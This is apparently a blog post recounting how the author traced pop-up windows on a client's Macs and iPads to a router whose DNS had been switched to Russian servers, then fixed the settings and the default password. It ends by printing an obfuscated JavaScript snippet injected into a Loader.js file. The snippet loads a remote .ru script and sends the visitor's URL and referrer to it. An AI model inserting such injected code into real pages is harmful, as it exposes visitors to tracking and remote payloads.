A few days ago a client had a window opened up in their browser with an Ip address and a query string parameter with his domain name. He asked me if his wordpress site had been hacked. I took a look through the files on the disk, dumped the database and did a grep, looked around the site using Chrome, Firefox and Safari and saw nothing. I even used Firefox to view generated source as sometimes scripts utilize the fact that JQuery is already loaded to load their extra payload through a template or addon.
Nothing. He runs a mac, his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but, he said something that was very confusing – our IPad’s do it too.
No Flash on IPad, can’t install most of the toolbar code on the IPad due to a fairly tight sandbox and the same behavior across multiple machines. Even machines that weren’t accessing his site were popping up windows/tabs in Safari.
I had him check his System Preferences, TCP/IP and the DNS settings and he read the numbers. The last one of 18.104.22.168 seemed odd, but, wouldn’t normally cause an issue since 22.214.171.124/8 isn’t routed. The other two DNS server IPs were read off and written down. Doing a reverse IP lookup resulted in a Not Found. Since he was on RoadRunner, I found that a bit odd, so, I did a whois and found out that both of the IP addresses listed as DNS were hosted in Russia.
Now we’re getting somewhere. The settings on his machine were grabbed from DHCP, so, that meant his router was probably set to use those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page and there they were. We modified them to use google’s resolvers and changed the password on the router to something a little more secure.
First thought was the Twitter sidebar, but, that calls Twitter directly which means all of that traffic would have to be proxied. Certainly wouldn’t want to do that when you have limited bandwidth. Feedburner seemed like a potential vector, but, probably very limited access and those were hrefs, so, they would have had to have been followed. The Feedburner widget wasn’t present. Bookmarklet.amplify.com seemed like a reasonable target, but, the DNS for it through the Russian DNS servers and other resolvers was the same. That isn’t to say that they couldn’t change it on a per request basis to balance for traffic, but, we’re going on the assumption it’ll be a fire and forget operation.
The Loader.js contains a tiny bit of extra code at the bottom containing:
var xxxxxx_html = '';
xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
xxxxxx_html += 'src="http://xx' + 'xxxx.ru/js.php?id=36274';
xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';
After years of reading about this type of attack, it is the first time I was able to witness it first-hand.